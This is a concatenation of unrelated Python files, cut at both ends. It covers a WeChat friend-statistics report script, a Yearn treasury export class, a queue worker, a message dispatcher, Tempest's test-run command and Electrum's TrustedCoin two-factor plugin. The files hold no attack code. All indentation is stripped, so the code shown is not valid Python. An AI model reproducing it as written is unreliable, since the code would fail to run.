elif (len(dict_common_in) > 0):
n = 1
# 排序,并转化为list
sort_list = sorted(dict_common_in.items(), key=lambda item: item[1], reverse=True)
# 取出前n大的值
sort_list = sort_list[:n]
bar = Bar('共同所在群聊分析')
bar.add(name='', x_axis=[x[0] for x in sort_list], y_axis=[x[1] for x in sort_list], legend_orient="vertical",
legend_pos="left")
bar.render('data/共同所在群聊分析.html')
# 运行前,请先确保安装了所需库文件
# 若没安装,请执行以下命令:pip install -r requirement.txt
if __name__ == '__main__':
# 初始化所需文件夹
init_folders()
# 启动微信机器人,自动根据操作系统执行不同的指令
if ('Windows' in system()):
# Windows
bot = Bot()
elif ('Darwin' in system()):
# MacOSX
bot = Bot(cache_path=True)
elif ('Linux' in system()):
# Linux
bot = Bot(console_qr=2, cache_path=True)
else:
# 自行确定
print(u"无法识别你的操作系统类型,请自己设置")
exit()
# 获取好友数据
print(u'正在获取微信好友数据信息,请耐心等待……')
friends = bot.friends(update=False)
# i.nick_name, i.remark_name, i.sex, i.province, i.city, i.signature
print(u'微信好友数据信息获取完毕\n')
print(u'正在分析你的群聊,请耐心等待……')
group_common_in()
print(u'分析群聊完毕\n')
print(u'正在获取微信好友头像信息,请耐心等待……')
# 创建一个队列,用于多线程下载头像,提高下载速度
queue_head_image = Queue()
# 将每个好友元素存入队列中
# 如果为了方便调试,可以仅仅插入几个数据,friends[1:10]
for user in friends:
queue_head_image.put(user)
# 启动10个线程下载头像
for i in range(1, 10):
t = Thread(target=download_head_image, args=(i,))
t.start()
print(u'微信好友头像信息获取完毕\n')
print(u'正在分析好友性别比例,请耐心等待……')
sex_ratio()
print(u'分析好友性别比例完毕\n')
print(u'正在分析好友地区分布,请耐心等待……')
region_distribution()
print(u'分析好友地区分布完毕\n')
print(u'正在统计你认识的好友,请耐心等待……')
statistics_friends()
print(u'统计你认识的好友完毕\n')
print(u'正在分析你最亲密的人,请耐心等待……')
analyze_remark_name()
print(u'分析你最亲密的人完毕\n')
print(u'正在分析你的特殊好友,请耐心等待……')
analyze_special_friends()
print(u'分析你的特殊好友完毕\n')
print(u'正在分析你的好友的个性签名,请耐心等待……')
analyze_signature()
print(u'分析你的好友的个性签名完毕\n')
# 由于下载头像是多线程进行,并且存在可能下载时间比较久的情况
# 所以当我们完成所有其他功能以后,需要等待微信好友头像数据下载完毕后再进行操作
while (not queue_head_image.empty()):
sleep(1)
print(u'正在拼接所有微信好友头像数据,请耐心等待……')
merge_head_image()
print(u'拼接所有微信好友头像数据完毕\n')
print(u'正在检测使用人脸作为头像的好友数量,请耐心等待……')
detect_human_face()
print(u'检测使用人脸作为头像的好友数量完毕\n')
# 生成一份最终的html文件
print(u'所有数据获取完毕,正在生成微信个人数据报告,请耐心等待……')
generate_html('微信个人数据报告.html')
print(u'生成微信个人数据报告完毕,该文件为当前目录下的[微信个人数据报告.html]\n')
# 调用系统方式自动打开这个html文件
print(u'已为你自动打开 微信个人数据报告.html')
open_html('微信个人数据报告.html')
|
treasury.py
|
import logging
import threading
import time
from brownie import Contract, chain, web3
from brownie.network.event import EventLookupError
from eth_abi import encode_single
from joblib import Parallel, delayed
from yearn.events import create_filter, decode_logs
from yearn.multicall2 import fetch_multicall
from yearn.outputs import victoria
from yearn.partners.partners import partners
from yearn.partners.snapshot import WildcardWrapper, Wrapper
from yearn.prices.constants import weth
from yearn.prices.magic import PriceError, get_price
from ..constants import TREASURY_WALLETS
logger = logging.getLogger(__name__)
def _get_price(token, block=None):
SKIP_PRICE = ["0xa9517B2E61a57350D6555665292dBC632C76adFe","0xb07de4b2989E180F8907B8C7e617637C26cE2776"] # shitcoins
try:
return get_price(token, block, silent=True)
except AttributeError:
if token not in SKIP_PRICE:
logger.warn(f"AttributeError while getting price for {Contract(token).symbol()} {token}")
return 0
except PriceError:
if token not in SKIP_PRICE:
logger.warn(f"PriceError while getting price for {Contract(token).symbol()} {token}")
return 0
except ValueError:
if token not in SKIP_PRICE:
logger.warn(f"ValueError while getting price for {Contract(token).symbol()} {token}")
return 0
def get_token_from_event(event):
try:
return event['Transfer'][0].address
except EventLookupError:
logger.critical(f'One of your cached contracts has an incorrect definition: {event.address}. Please fix this manually')
raise(f'One of your cached contracts has an incorrect definition: {event.address}. Please fix this manually')
class Treasury:
'''
Used to export Yearn financial reports
'''
def __init__(self, watch_events_forever = False):
self.addresses = list(TREASURY_WALLETS)
self._transfers = []
self._topics_in = [
'0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef',
None,
['0x000000000000000000000000' + address[2:] for address in self.addresses]
] # Transfers into Yearn wallets
self._topics_out = [
'0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef',
['0x000000000000000000000000' + address[2:] for address in self.addresses]
] # Transfers out of Yearn wallets
self._watch_events_forever = watch_events_forever
self._done = threading.Event()
self._thread = threading.Thread(target=self.watch_transfers, daemon=True)
# descriptive functions
# assets
def assets(self, block=None) -> dict:
assets = self.held_assets(block=block)
assets.update(self.collateral(block=block))
return assets
def token_list(self, address, block=None) -> list:
self.load_transfers()
if block:
return list({get_token_from_event(transfer) for transfer in self._transfers if transfer['Transfer'].values()[1] == address and transfer['Transfer'][0].block_number <= block})
else:
return list({get_token_from_event(transfer) for transfer in self._transfers if transfer['Transfer'].values()[1] == address})
def held_assets(self,block=None) -> dict:
balances = {}
for address in self.addresses:
# get token balances
tokens = self.token_list(address,block=block)
token_balances = fetch_multicall(*[[Contract(token),"balanceOf",address] for token in tokens], block=block)
decimals = fetch_multicall(*[[Contract(token),"decimals"] for token in tokens], block=block)
token_balances = [balance / 10 ** decimal if decimal else 0 for balance, decimal in zip(token_balances,decimals)]
token_prices = Parallel(8,'threading')(delayed(_get_price)(token,block) for token in tokens)
token_balances = [{'balance': balance, 'usd value': balance * price} for balance, price in zip(token_balances, token_prices)]
balances[address] = dict(zip(tokens,token_balances))
# then, add eth
if block:
balance = web3.eth.get_balance(address, block_identifier = block) / 10 ** 18
else:
balance = web3.eth.get_balance(address) / 10 ** 18
balances[address]['ETH'] = {'balance': balance, 'usd value': balance * get_price(weth, block)}
return balances
def collateral(self, block=None) -> dict:
collateral = {
'MakerDAO': self.maker_collateral(block=block),
}
if block is None or block >= 11315910:
collateral['Unit.xyz'] = self.unit_collateral(block=block)
return collateral
def maker_collateral(self, block=None) -> dict:
proxy_registry = Contract('0x4678f0a6958e4D2Bc4F1BAF7Bc52E8F3564f3fE4')
cdp_manager = Contract('0x5ef30b9986345249bc32d8928B7ee64DE9435E39')
#ychad = Contract('ychad.eth')
ychad = Contract('0xfeb4acf3df3cdea7399794d0869ef76a6efaff52')
vat = Contract('0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B')
proxy = proxy_registry.proxies(ychad)
cdp = cdp_manager.first(proxy)
urn = cdp_manager.urns(cdp)
ilk = encode_single('bytes32', b'YFI-A')
ink = vat.urns(ilk, urn, block_identifier = block).dict()["ink"]
yfi = "0x0bc529c00C6401aEF6D220BE8C6Ea1667F6Ad93e"
collateral = {
yfi: {
'balance': ink / 10 ** 18,
'usd value': ink / 10 ** 18 * get_price(yfi, block) if ink > 0 else 0
}
}
return collateral
def unit_collateral(self, block=None) -> dict:
if block and block < 11315910:
return
#ychad = Contract('ychad.eth')
ychad = Contract('0xfeb4acf3df3cdea7399794d0869ef76a6efaff52')
unitVault = Contract("0xb1cff81b9305166ff1efc49a129ad2afcd7bcf19")
yfi = "0x0bc529c00C6401aEF6D220BE8C6Ea1667F6Ad93e"
bal = unitVault.collaterals(yfi,ychad, block_identifier = block)
collateral = {
yfi: {
'balance': bal / 10 ** 18,
'usd value': bal / 10 ** 18 * get_price(yfi, block)
}
}
return collateral
#def bonded_kp3r(self, block=None) -> dict:
# descriptive functions
# debt
def debt(self, block=None) -> dict:
debt = {
'MakerDAO': self.maker_debt(block=block),
}
if not block or block >= 11315910:
debt['Unit.xyz'] = self.unit_debt(block=block)
#self.accounts_payable()
return debt
def accounts_payable(self, block=None) -> dict:
for i, partner in enumerate(partners):
if i == 1:
flat_wrappers = []
for wrapper in partner.wrappers:
if isinstance(wrapper, Wrapper):
flat_wrappers.append(wrapper)
elif isinstance(wrapper, WildcardWrapper):
flat_wrappers.extend(wrapper.unwrap())
for wrapper in flat_wrappers:
print(wrapper.protocol_fees(block=block))
def maker_debt(self, block=None) -> dict:
proxy_registry = Contract('0x4678f0a6958e4D2Bc4F1BAF7Bc52E8F3564f3fE4')
cdp_manager = Contract('0x5ef30b9986345249bc32d8928B7ee64DE9435E39')
#ychad = Contract('ychad.eth')
ychad = Contract('0xfeb4acf3df3cdea7399794d0869ef76a6efaff52')
vat = Contract('0x35D1b3F3D7966A1DFe207aa4514C12a259A0492B')
proxy = proxy_registry.proxies(ychad)
cdp = cdp_manager.first(proxy)
urn = cdp_manager.urns(cdp)
ilk = encode_single('bytes32', b'YFI-A')
art = vat.urns(ilk, urn, block_identifier = block).dict()["art"]
rate = vat.ilks(ilk, block_identifier = block).dict()["rate"]
debt = art * rate / 1e27
dai = '0x6B175474E89094C44Da98b954EedeAC495271d0F'
debt = {
dai: {
'balance': debt / 10 ** 18,
'usd value': debt / 10 ** 18
}
}
return debt
def unit_debt(self, block=None) -> dict:
if block and block < 11315910:
return
#ychad = Contract('ychad.eth')
ychad = Contract('0xfeb4acf3df3cdea7399794d0869ef76a6efaff52')
unitVault = Contract("0xb1cff81b9305166ff1efc49a129ad2afcd7bcf19")
yfi = "0x0bc529c00C6401aEF6D220BE8C6Ea1667F6Ad93e"
usdp = '0x1456688345527bE1f37E9e627DA0837D6f08C925'
debt = unitVault.getTotalDebt(yfi,ychad, block_identifier = block)
debt = {
usdp: {
'balance': debt / 10 ** 18,
'usd value': debt / 10 ** 18
}
}
return debt
# helper functions
def load_transfers(self):
if not self._thread._started.is_set():
self._thread.start()
self._done.wait()
def watch_transfers(self):
start = time.time()
logger.info('pulling treasury transfer events, please wait patiently this takes a while...')
self.log_filter_in = create_filter(None, topics=self._topics_in)
self.log_filter_out = create_filter(None, topics=self._topics_out)
for block in chain.new_blocks(height_buffer=12):
logs = self.log_filter_in.get_new_entries()
self.process_transfers(logs)
logs = self.log_filter_out.get_new_entries()
self.process_transfers(logs)
if not self._done.is_set():
self._done.set()
logger.info("loaded treasury transfer events in %.3fs", time.time() - start)
if not self._watch_events_forever:
break
time.sleep(300)
def process_transfers(self, logs):
for log in logs:
try:
event = decode_logs([log]) # NOTE: We have to decode logs here because silly SHIBAS token prevents us from batch decoding logs
self._transfers.append(event)
except:
if log.address == '0xeF81c2C98cb9718003A89908e6bd1a5fA8A098A3':
print('skipping spaceshiba token, logs are formed weird')
else:
print('unable to decode logs, figure out why')
print(log)
# export functions
def describe(self, block) -> dict:
return {
'assets': self.assets(block),
'debt': self.debt(block)
}
def export(self, block, ts):
start = time.time()
data = self.describe(block)
victoria.export_treasury(ts, data)
logger.info('exported block=%d took=%.3fs', block, time.time() - start)
|
worker.py
|
import threading, time, sys, getopt, queue
from debug_utils import *
from commer import CommerOnWorker, LISTEN_IP
from msg import result_from_req, InfoType, Info
from plot import plot_worker
class Worker():
def __init__(self, _id):
self._id = _id
self.msg_q = queue.Queue()
# self.epoch__num_req_l = []
self.commer = CommerOnWorker(self._id, self.handle_msg)
self.on = True
self.msg_to_send_q = queue.Queue()
t_send = threading.Thread(target=self.run_send, daemon=True)
t_send.start()
self.probe_to_send_q = queue.Queue()
t_send_probe = threading.Thread(target=self.run_send_probe, daemon=True)
t_send_probe.start()
t = threading.Thread(target=self.run, daemon=True)
t.start()
t.join()
def close(self):
log(DEBUG, "started")
self.commer.close()
self.msg_q.put(None)
self.probe_to_send_q.put(None)
self.msg_to_send_q.put(None)
self.on = False
log(DEBUG, "done")
def handle_msg(self, msg):
if msg.payload.is_info() and msg.payload.typ == InfoType.close:
self.close()
elif msg.payload.is_req():
self.msg_q.put(msg)
# self.epoch__num_req_l.append((time.time(), self.msg_q.qsize()))
def run(self):
while self.on:
msg = self.msg_q.get(block=True)
if msg is None:
log(DEBUG, "recved close signal")
self.close()
return
# TODO: real processing goes in here
req = msg.payload
if not req.probe:
log(DEBUG, "serving/sleeping", serv_time=req.serv_time)
time.sleep(req.serv_time)
log(DEBUG, "finished serving")
# self.epoch__num_req_l.append((time.time(), self.msg_q.qsize()))
msg.payload = Info(req._id, InfoType.worker_req_completion)
self.commer.send_info_to_master(msg)
result = result_from_req(req)
result.epoch_departed_cluster = time.time()
# result.size_inBs = ?
msg.payload = result
if not req.probe:
self.msg_to_send_q.put(msg)
else:
self.probe_to_send_q.put(msg)
plot_worker(self)
def run_send_probe(self):
while self.on:
msg = self.probe_to_send_q.get(block=True)
if msg is None:
log(DEBUG, "got close signal")
return
serv_time = msg.payload.serv_time
log(DEBUG, "sleeping for probe", serv_time=serv_time)
time.sleep(serv_time)
log(DEBUG, "done sleeping for probe")
self.msg_to_send_q.put(msg)
def run_send(self):
while self.on:
msg = self.msg_to_send_q.get(block=True)
if msg is None:
log(DEBUG, "got close signal")
return
self.commer.send_result_to_user(msg)
def parse_argv(argv):
m = {}
try:
opts, args = getopt.getopt(argv, '', ['i=', 'log_to_std='])
except getopt.GetoptError:
assert_("Wrong args;", opts=opts, args=args)
for opt, arg in opts:
if opt == '--log_to_std':
m['log_to_std'] = bool(int(arg))
elif opt == '--i':
m['i'] = arg
else:
assert_("Unexpected opt= {}, arg= {}".format(opt, arg))
if 'log_to_std' not in m:
m['log_to_std'] = True
if 'i' not in m:
m['i'] = LISTEN_IP
return m
if __name__ == '__main__':
m = parse_argv(sys.argv[1:])
_id = 'w_' + m['i']
log_to_file('{}.log'.format(_id))
if m['log_to_std']:
log_to_std()
w = Worker(_id)
# input("Enter to finish...\n")
# sys.exit()
|
botal.py
|
from threading import Thread, Lock
class Botal:
class _ThreadSafeGenerator:
def __init__(self, uuid, handler):
self.uuid = uuid
self._lock = Lock()
self._handler = handler(uuid)
next(self._handler)
def send(self, message):
with self._lock:
self._handler.send(message)
def __hash__(self):
return self.uuid
def __eq__(self, other):
return self.uuid == other.user_id
def __init__(self, generator, uuid):
self._message_handler = None
self._error_handlers = []
self._mappings = {}
self.generator = generator
self.uuid = uuid
def _handle_message(self, user_id, message):
if user_id in self._mappings:
user = self._mappings[user_id]
else:
user = self._ThreadSafeGenerator(user_id, self._message_handler)
self._mappings[user_id] = user
try:
user.send(message)
except Exception as e:
del self._mappings[user_id]
for e_, f in self._error_handlers:
if isinstance(e, e_):
f(user_id, e)
break
else:
raise e
def handler(self, func):
self._message_handler = func
return func
def error_handler(self, error):
def decorator(func):
self._error_handlers.append((error, func))
return func
return decorator
def run(self):
def handle():
for event in self.generator:
uuid = self.uuid(event)
Thread(target=self._handle_message, args=[uuid, event], daemon=True).start()
assert self._message_handler
thread = Thread(target=handle, daemon=True)
thread.start()
thread.join()
|
run.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Runs tempest tests
This command is used for running the tempest tests
Test Selection
==============
Tempest run has several options:
* **--regex/-r**: This is a selection regex like what testr uses. It will run
any tests that match on re.match() with the regex
* **--smoke**: Run all the tests tagged as smoke
There are also the **--blacklist-file** and **--whitelist-file** options that
let you pass a filepath to tempest run with the file format being a line
separated regex, with '#' used to signify the start of a comment on a line.
For example::
# Regex file
^regex1 # Match these tests
.*regex2 # Match those tests
The blacklist file will be used to construct a negative lookahead regex and
the whitelist file will simply OR all the regexes in the file. The whitelist
and blacklist file options are mutually exclusive so you can't use them
together. However, you can combine either with a normal regex or the *--smoke*
flag. When used with a blacklist file the generated regex will be combined to
something like::
^((?!black_regex1|black_regex2).)*$cli_regex1
When combined with a whitelist file all the regexes from the file and the CLI
regexes will be ORed.
You can also use the **--list-tests** option in conjunction with selection
arguments to list which tests will be run.
Test Execution
==============
There are several options to control how the tests are executed. By default
tempest will run in parallel with a worker for each CPU present on the machine.
If you want to adjust the number of workers use the **--concurrency** option
and if you want to run tests serially use **--serial**
Running with Workspaces
-----------------------
Tempest run enables you to run your tempest tests from any setup tempest
workspace it relies on you having setup a tempest workspace with either the
``tempest init`` or ``tempest workspace`` commands. Then using the
``--workspace`` CLI option you can specify which one of your workspaces you
want to run tempest from. Using this option you don't have to run Tempest
directly with you current working directory being the workspace, Tempest will
take care of managing everything to be executed from there.
Running from Anywhere
---------------------
Tempest run provides you with an option to execute tempest from anywhere on
your system. You are required to provide a config file in this case with the
``--config-file`` option. When run tempest will create a .testrepository
directory and a .testr.conf file in your current working directory. This way
you can use testr commands directly to inspect the state of the previous run.
Test Output
===========
By default tempest run's output to STDOUT will be generated using the
subunit-trace output filter. But, if you would prefer a subunit v2 stream be
output to STDOUT use the **--subunit** flag
"""
import io
import os
import sys
import threading
from cliff import command
from os_testr import regex_builder
from os_testr import subunit_trace
from testrepository.commands import run_argv
from tempest.cmd import init
from tempest.cmd import workspace
from tempest import config
CONF = config.CONF
class TempestRun(command.Command):
def _set_env(self, config_file=None):
if config_file:
CONF.set_config_path(os.path.abspath(config_file))
# NOTE(mtreinish): This is needed so that testr doesn't gobble up any
# stacktraces on failure.
if 'TESTR_PDB' in os.environ:
return
else:
os.environ["TESTR_PDB"] = ""
def _create_testrepository(self):
if not os.path.isdir('.testrepository'):
returncode = run_argv(['testr', 'init'], sys.stdin, sys.stdout,
sys.stderr)
if returncode:
sys.exit(returncode)
def _create_testr_conf(self):
top_level_path = os.path.dirname(os.path.dirname(__file__))
discover_path = os.path.join(top_level_path, 'test_discover')
file_contents = init.TESTR_CONF % (top_level_path, discover_path)
with open('.testr.conf', 'w+') as testr_conf_file:
testr_conf_file.write(file_contents)
def take_action(self, parsed_args):
returncode = 0
if parsed_args.config_file:
self._set_env(parsed_args.config_file)
else:
self._set_env()
# Workspace execution mode
if parsed_args.workspace:
workspace_mgr = workspace.WorkspaceManager(
parsed_args.workspace_path)
path = workspace_mgr.get_workspace(parsed_args.workspace)
os.chdir(path)
# NOTE(mtreinish): tempest init should create a .testrepository dir
# but since workspaces can be imported let's sanity check and
# ensure that one is created
self._create_testrepository()
# Local execution mode
elif os.path.isfile('.testr.conf'):
# If you're running in local execution mode and there is not a
# testrepository dir create one
self._create_testrepository()
# local execution with config file mode
elif parsed_args.config_file:
self._create_testr_conf()
self._create_testrepository()
else:
print("No .testr.conf file was found for local execution")
sys.exit(2)
regex = self._build_regex(parsed_args)
if parsed_args.list_tests:
argv = ['tempest', 'list-tests', regex]
returncode = run_argv(argv, sys.stdin, sys.stdout, sys.stderr)
else:
options = self._build_options(parsed_args)
returncode = self._run(regex, options)
sys.exit(returncode)
def get_description(self):
return 'Run tempest'
def get_parser(self, prog_name):
parser = super(TempestRun, self).get_parser(prog_name)
parser = self._add_args(parser)
return parser
def _add_args(self, parser):
# workspace args
parser.add_argument('--workspace', default=None,
help='Name of tempest workspace to use for running'
' tests. You can see a list of workspaces '
'with tempest workspace list')
parser.add_argument('--workspace-path', default=None,
dest='workspace_path',
help="The path to the workspace file, the default "
"is ~/.tempest/workspace.yaml")
# Configuration flags
parser.add_argument('--config-file', default=None, dest='config_file',
help='Configuration file to run tempest with')
# test selection args
regex = parser.add_mutually_exclusive_group()
regex.add_argument('--smoke', action='store_true',
help="Run the smoke tests only")
regex.add_argument('--regex', '-r', default='',
help='A normal testr selection regex used to '
'specify a subset of tests to run')
list_selector = parser.add_mutually_exclusive_group()
list_selector.add_argument('--whitelist-file', '--whitelist_file',
help="Path to a whitelist file, this file "
"contains a separate regex on each "
"newline.")
list_selector.add_argument('--blacklist-file', '--blacklist_file',
help='Path to a blacklist file, this file '
'contains a separate regex exclude on '
'each newline')
# list only args
parser.add_argument('--list-tests', '-l', action='store_true',
help='List tests',
default=False)
# execution args
parser.add_argument('--concurrency', '-w',
help="The number of workers to use, defaults to "
"the number of cpus")
parallel = parser.add_mutually_exclusive_group()
parallel.add_argument('--parallel', dest='parallel',
action='store_true',
help='Run tests in parallel (this is the'
' default)')
parallel.add_argument('--serial', dest='parallel',
action='store_false',
help='Run tests serially')
# output args
parser.add_argument("--subunit", action='store_true',
help='Enable subunit v2 output')
parser.set_defaults(parallel=True)
return parser
def _build_regex(self, parsed_args):
regex = ''
if parsed_args.smoke:
regex = 'smoke'
elif parsed_args.regex:
regex = parsed_args.regex
if parsed_args.whitelist_file or parsed_args.blacklist_file:
regex = regex_builder.construct_regex(parsed_args.blacklist_file,
parsed_args.whitelist_file,
regex, False)
return regex
def _build_options(self, parsed_args):
options = []
if parsed_args.subunit:
options.append("--subunit")
if parsed_args.parallel:
options.append("--parallel")
if parsed_args.concurrency:
options.append("--concurrency=%s" % parsed_args.concurrency)
return options
def _run(self, regex, options):
returncode = 0
argv = ['tempest', 'run', regex] + options
if '--subunit' in options:
returncode = run_argv(argv, sys.stdin, sys.stdout, sys.stderr)
else:
argv.append('--subunit')
stdin = io.StringIO()
stdout_r, stdout_w = os.pipe()
subunit_w = os.fdopen(stdout_w, 'wt')
subunit_r = os.fdopen(stdout_r)
returncodes = {}
def run_argv_thread():
returncodes['testr'] = run_argv(argv, stdin, subunit_w,
sys.stderr)
subunit_w.close()
run_thread = threading.Thread(target=run_argv_thread)
run_thread.start()
returncodes['subunit-trace'] = subunit_trace.trace(
subunit_r, sys.stdout, post_fails=True, print_failures=True)
run_thread.join()
subunit_r.close()
# python version of pipefail
if returncodes['testr']:
returncode = returncodes['testr']
elif returncodes['subunit-trace']:
returncode = returncodes['subunit-trace']
return returncode
|
qt.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from functools import partial
import threading
import sys
import os
from typing import TYPE_CHECKING
from PyQt5.QtGui import QPixmap
from PyQt5.QtCore import QObject, pyqtSignal
from PyQt5.QtWidgets import (QTextEdit, QVBoxLayout, QLabel, QGridLayout, QHBoxLayout,
QRadioButton, QCheckBox, QLineEdit)
from electrum.gui.qt.util import (read_QIcon, WindowModalDialog, WaitingDialog, OkButton,
CancelButton, Buttons, icon_path, WWLabel, CloseButton)
from electrum.gui.qt.qrcodewidget import QRCodeWidget
from electrum.gui.qt.amountedit import AmountEdit
from electrum.gui.qt.main_window import StatusBarButton
from electrum.gui.qt.installwizard import InstallWizard
from electrum.i18n import _
from electrum.plugin import hook
from electrum.util import is_valid_email
from electrum.logging import Logger
from electrum.base_wizard import GoBack, UserCancelled
from .trustedcoin import TrustedCoinPlugin, server
if TYPE_CHECKING:
from electrum.gui.qt.main_window import ElectrumWindow
from electrum.wallet import Abstract_Wallet
class TOS(QTextEdit):
tos_signal = pyqtSignal()
error_signal = pyqtSignal(object)
class HandlerTwoFactor(QObject, Logger):
def __init__(self, plugin, window):
QObject.__init__(self)
self.plugin = plugin
self.window = window
Logger.__init__(self)
def prompt_user_for_otp(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.plugin.wallet_class):
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].can_sign(tx, ignore_watching_only=True):
self.logger.info("twofactor: xpub3 not needed")
return
window = self.window.top_level_window()
auth_code = self.plugin.auth_dialog(window)
WaitingDialog(parent=window,
message=_('Waiting for TrustedCoin server to sign transaction...'),
task=lambda: wallet.on_otp(tx, auth_code),
on_success=lambda *args: on_success(tx),
on_error=on_failure)
class Plugin(TrustedCoinPlugin):
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
@hook
def load_wallet(self, wallet: 'Abstract_Wallet', window: 'ElectrumWindow'):
if not isinstance(wallet, self.wallet_class):
return
wallet.handler_2fa = HandlerTwoFactor(self, window)
if wallet.can_sign_without_server():
msg = ' '.join([
_('This wallet was restored from seed, and it contains two master private keys.'),
_('Therefore, two-factor authentication is disabled.')
])
action = lambda: window.show_message(msg)
else:
action = partial(self.settings_dialog, window)
button = StatusBarButton(read_QIcon("trustedcoin-status.png"),
_("TrustedCoin"), action)
window.statusBar().addPermanentWidget(button)
self.start_request_thread(window.wallet)
def auth_dialog(self, window):
d = WindowModalDialog(window, _("Authorization"))
vbox = QVBoxLayout(d)
pw = AmountEdit(None, is_int = True)
msg = _('Please enter your Google Authenticator code')
vbox.addWidget(QLabel(msg))
grid = QGridLayout()
grid.setSpacing(8)
grid.addWidget(QLabel(_('Code')), 1, 0)
grid.addWidget(pw, 1, 1)
vbox.addLayout(grid)
msg = _('If you have lost your second factor, you need to restore your wallet from seed in order to request a new code.')
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
return pw.get_amount()
def prompt_user_for_otp(self, wallet, tx, on_success, on_failure):
wallet.handler_2fa.prompt_user_for_otp(wallet, tx, on_success, on_failure)
def waiting_dialog_for_billing_info(self, window, *, on_finished=None):
def task():
return self.request_billing_info(window.wallet, suppress_connection_error=False)
def on_error(exc_info):
e = exc_info[1]
window.show_error("{header}\n{exc}\n\n{tor}"
.format(header=_('Error getting TrustedCoin account info.'),
exc=repr(e),
tor=_('If you keep experiencing network problems, try using a Tor proxy.')))
return WaitingDialog(parent=window,
message=_('Requesting account info from TrustedCoin server...'),
task=task,
on_success=on_finished,
on_error=on_error)
@hook
def abort_send(self, window):
wallet = window.wallet
if not isinstance(wallet, self.wallet_class):
return
if wallet.can_sign_without_server():
return
if wallet.billing_info is None:
self.waiting_dialog_for_billing_info(window)
return True
return False
def settings_dialog(self, window):
self.waiting_dialog_for_billing_info(window,
on_finished=partial(self.show_settings_dialog, window))
def show_settings_dialog(self, window, success):
if not success:
window.show_message(_('Server not reachable.'))
return
wallet = window.wallet
d = WindowModalDialog(window, _("TrustedCoin Information"))
d.setMinimumSize(500, 200)
vbox = QVBoxLayout(d)
hbox = QHBoxLayout()
logo = QLabel()
logo.setPixmap(QPixmap(icon_path("trustedcoin-status.png")))
msg = _('This wallet is protected by TrustedCoin\'s two-factor authentication.') + '<br/>'\
+ _("For more information, visit") + " <a href=\"https://api.trustedcoin.com/#/electrum-help\">https://api.trustedcoin.com/#/electrum-help</a>"
label = QLabel(msg)
label.setOpenExternalLinks(1)
hbox.addStretch(10)
hbox.addWidget(logo)
hbox.addStretch(10)
hbox.addWidget(label)
hbox.addStretch(10)
vbox.addLayout(hbox)
vbox.addStretch(10)
msg = _('TrustedCoin charges a small fee to co-sign transactions. The fee depends on how many prepaid transactions you buy. An extra output is added to your transaction every time you run out of prepaid transactions.') + '<br/>'
label = QLabel(msg)
label.setWordWrap(1)
vbox.addWidget(label)
vbox.addStretch(10)
grid = QGridLayout()
vbox.addLayout(grid)
price_per_tx = wallet.price_per_tx
n_prepay = wallet.num_prepay()
i = 0
for k, v in sorted(price_per_tx.items()):
if k == 1:
continue
grid.addWidget(QLabel("Pay every %d transactions:"%k), i, 0)
grid.addWidget(QLabel(window.format_amount(v/k) + ' ' + window.base_unit() + "/tx"), i, 1)
b = QRadioButton()
b.setChecked(k == n_prepay)
b.clicked.connect(lambda b, k=k: self.config.set_key('trustedcoin_prepay', k, True))
grid.addWidget(b, i, 2)
i += 1
n = wallet.billing_info.get('tx_remaining', 0)
grid.addWidget(QLabel(_("Your wallet has {} prepaid transactions.").format(n)), i, 0)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def go_online_dialog(self, wizard: InstallWizard):
msg = [
_("Your wallet file is: {}.").format(os.path.abspath(wizard.path)),
_("You need to be online in order to complete the creation of "
"your wallet. If you generated your seed on an offline "
'computer, click on "{}" to close this window, move your '
"wallet file to an online computer, and reopen it with "
"Electrum.").format(_('Cancel')),
_('If you are online, click on "{}" to continue.').format(_('Next'))
]
msg = '\n\n'.join(msg)
wizard.reset_stack()
try:
wizard.confirm_dialog(title='', message=msg, run_next = lambda x: wizard.run('accept_terms_of_use'))
except (GoBack, UserCancelled):
# user clicked 'Cancel' and decided to move wallet file manually
storage, db = wizard.create_storage(wizard.path)
raise
def accept_terms_of_use(self, window):
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Terms of Service")))
tos_e = TOS()
tos_e.setReadOnly(True)
vbox.addWidget(tos_e)
tos_received = False
vbox.addWidget(QLabel(_("Please enter your e-mail address")))
email_e = QLineEdit()
vbox.addWidget(email_e)
next_button = window.next_button
prior_button_text = next_button.text()
next_button.setText(_('Accept'))
def request_TOS():
try:
tos = server.get_terms_of_service()
except Exception as e:
self.logger.exception('Could not retrieve Terms of Service')
tos_e.error_signal.emit(_('Could not retrieve Terms of Service:')
+ '\n' + repr(e))
return
